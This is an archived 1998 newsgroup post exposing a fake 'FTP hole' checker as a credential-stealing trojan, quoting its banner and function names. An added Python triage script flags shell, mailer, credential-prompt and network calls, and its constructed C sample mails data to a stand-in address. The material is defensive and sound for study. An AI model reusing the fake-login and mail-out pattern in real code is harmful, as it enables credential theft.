Security: Fake "ftp-hole"-checker ...

Post by Garry Glendow » Mon, 04 May 1998 04:00:00



On the 'net a program appeared, which states it is a checker for an
FTP-hole in Linux' FTP-Daemon. Closer (oh well...) examination of the
program, which starts like this:

/* FTP hole bug [05/01/98]
 * Affected Operating Systems: ALL LINUX
 * Exploitation Result: USers get root suid big on login rhost
 *
 * Syntax:
 * user~$ cc -o ftphole ftphole.c
 * user~$ ./ftphole
 *
 * it will then test and core dump an rhost file on your home dir with a suid bit
 * then it'll bring you to a login screen and you login as normal and then
 * using the rhost file with a suid bit you have a root shell
 *
 * www:~$ id
 * root
 *
 * pheer!!
 */

will let even an inexperienced C-programmer recognise the scam ... the

via mail ... anyway, the program doesn't hide its true functions at all,
even the function names speak for themselves:

[..]
  pimpthem();
  fakelogin();
  emailus();
[..]

No serious attack for serious system admins, but nonetheless ...

-gg
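
Added example, not part of the original post and not code from the program it describes: a small Python triage pass over untrusted C source before compiling it, which lists the function names it calls and flags lines that run shell commands, invoke a mailer or prompt for credentials. The indicator patterns and the sample source are constructed for illustration; only the names pimpthem, fakelogin and emailus come from the post.

```python
import re

# Heuristic indicators; the categories and patterns are assumptions of this example.
INDICATORS = {
    "runs a shell command": re.compile(r"\b(system|popen|exec[lv]p?e?)\s*\("),
    "invokes a mailer": re.compile(r"\b(sendmail|mailx?)\b"),
    "prompts for credentials": re.compile(r'\bgetpass\s*\(|"[^"\n]*(login|password)\s*:', re.I),
    "opens a network connection": re.compile(r"\b(socket|connect|gethostbyname)\s*\("),
}
# A string literal, a block comment, or a line comment, whichever starts first.
TOKEN = re.compile(r'"(?:\\.|[^"\\\n])*"|/\*.*?\*/|//[^\n]*', re.S)
CALL = re.compile(r"\b([A-Za-z_]\w*)\s*\(")
KEYWORDS = {"if", "while", "for", "switch", "return", "sizeof"}

def strip_comments(src):
    """Blank out comments (keeping line numbers) so banner text is not matched."""
    def keep_or_blank(m):
        text = m.group(0)
        return text if text.startswith('"') else "\n" * text.count("\n")
    return TOKEN.sub(keep_or_blank, src)

def called_names(src):
    """Every identifier followed by '(': the functions the program defines or calls."""
    return sorted(set(CALL.findall(strip_comments(src))) - KEYWORDS)

def triage(src):
    """Return (line number, indicator label) pairs for lines worth reading first."""
    hits = []
    for number, line in enumerate(strip_comments(src).split("\n"), start=1):
        for label, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((number, label))
    return hits

# Constructed sample: only the three function names come from the post.
SAMPLE = '''/* constructed sample: the word mail in this comment must not be flagged */
#include <stdio.h>
#include <stdlib.h>
int main(void) {
    printf("login: ");
    pimpthem();
    fakelogin();
    emailus();
    system("mail collector@example.invalid");
    return 0;
}
'''

if __name__ == "__main__":
    print(called_names(SAMPLE), triage(SAMPLE))
```

The patterns are line-based heuristics for deciding where to start reading, not proof that a file is safe; a clean result still calls for reading the source.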

 
 
 

13. Why is "." in the path a security hole ?